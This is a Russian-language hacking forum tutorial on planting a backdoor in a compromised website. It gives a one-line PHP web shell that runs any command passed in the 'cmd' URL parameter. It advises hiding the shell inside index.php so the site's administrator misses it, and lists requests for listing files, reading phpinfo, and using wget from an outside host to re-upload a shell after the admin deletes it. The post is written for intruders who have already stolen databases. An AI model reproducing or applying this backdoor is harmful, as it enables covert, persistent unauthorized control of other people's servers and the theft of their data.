Бэкдор
Посидел,подумал и решил всетаки написать...
Для начала определение:
Код:
Бэкдор, backdoor (от англ. back door, чёрный ход) — программы, которые устанавливает взломщик на взломанном им компьютере после получения первоначального доступа с целью повторного получения доступа к системе. При подключении предоставляет какой-либо доступ к системе (как правило, это командный интерпретатор: в GNU/Linux — Bash, в Microsoft Windows NT — cmd). Взято с вики
Перейдем к примеру.
Для чего же нужны бэкдоры? Предположим такую ситуацию - вы взломали сайт, залили шелл, слили базу и т.д., но админ нашел шелл и удалил его, так вот, для этой беспалевности и нужен бэкдор. Просто вставим малозаметный код и все, админ не пропалит.
Ну а теперь более подробно:
Код самого простейшего бэкдора:
Код:
<?php
system($_GET['cmd']);
?>
Допустим вы залили шелл,ищем любой файл с расширением .php ,который можно редактировать. Для этой роли блестяще подойдет index.php . Открываем файл, вставляем код и сохраняем. Надо обратить внимание на то, что index.php уже имеет "<?php" и "?>" ,так что их вставлять не надо.
Далее...
Переходим на наш сайт (условно _http://site.ru/index.php) и видим что ничего не происходит....
Но стоит нам перейти на _http://site.ru/index.php?cmd=dir мы видим список файлов находящихся в директории. Вуаля)
самые важные для нас функции бэкдора это:
_http://site.ru/index.php?cmd=dir - как мы уже знаем, показывает список файлов в директории
_http://site.ru/index.php?cmd=info - узнаем phpinfo
_http://site.ru/index.php?cmd=wget [Ссылки могут видеть только зарегистрированные пользователи. ] - а этот запрос повторно заливает шелл (хочу заметить, что пробел в ссылке обязателен!), на случай если все шеллы которые вы заливали удалил админ. Этот шелл будет доступен по адресу _http://site.ru/0001.php
Я знаю что найдутся те,которые чего то не поняли в последней ссылке,так вот вам скрин
[Ссылки могут видеть только зарегистрированные пользователи. ]
Ахтунг!(внимание!) "http://xaker9316.narod.ru/0001.php"-это ссылка тоже условная,вместо нее должна быть ссылка на ваш шелл.
Ну вот и все) Спасибо за внимание.
Специально для Zhyk.ru
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]